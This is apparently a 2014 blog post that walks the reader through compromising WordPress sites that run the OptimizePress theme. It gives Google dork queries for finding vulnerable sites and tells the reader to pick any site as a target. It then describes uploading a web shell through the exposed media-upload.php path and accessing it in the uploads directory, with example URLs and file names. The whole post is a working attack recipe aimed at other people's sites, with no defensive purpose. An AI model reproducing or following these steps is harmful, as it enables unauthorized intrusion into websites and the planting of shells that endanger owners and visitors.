Sunday, 4 May 2014

Exploit WordPress: OptimizePress Theme - File Upload Vulnerability







Finding Vulnerable Target:

Dork   : inurl:/wp-content/themes/OptimizePress/
             inurl:/wp-content/uploads/optpress/

Exploit : /wp-content/themes/OptimizePress/lib/admin/media-upload.php


1- First of all, as usual, copy and paste one of those dork on Google, you will see thousands of site.

2- Choose any site as your target


Exploiting Target:

1- Once you have chosen a target, simply paste the exploit at the end of the site url ,

For example you found,

 http://www.site.com/wp-content/themes/OptimizePress/js/

So it would be something like this,

  http://www.site.com/wp-content/themes/OptimizePress/lib/admin/media-upload.php 

2- If the site is vulnerable, you will see this,




3- Click on Choose File  and browse for your shell.

4- Click Upload File and if the upload was success, you will see the file name with some id or date infront of it.




5- Your shell was uploaded to this directory,

/wp-content/uploads/optpress/images_comingsoon/  

6- In order to view it, add the path at the end of the site url with the given file id. 
Example for mine is,

   http://www.site.com/wp-content/uploads/optpress/images_comingsoon/2013112722-02-57osirt.php

That's all. Thank you.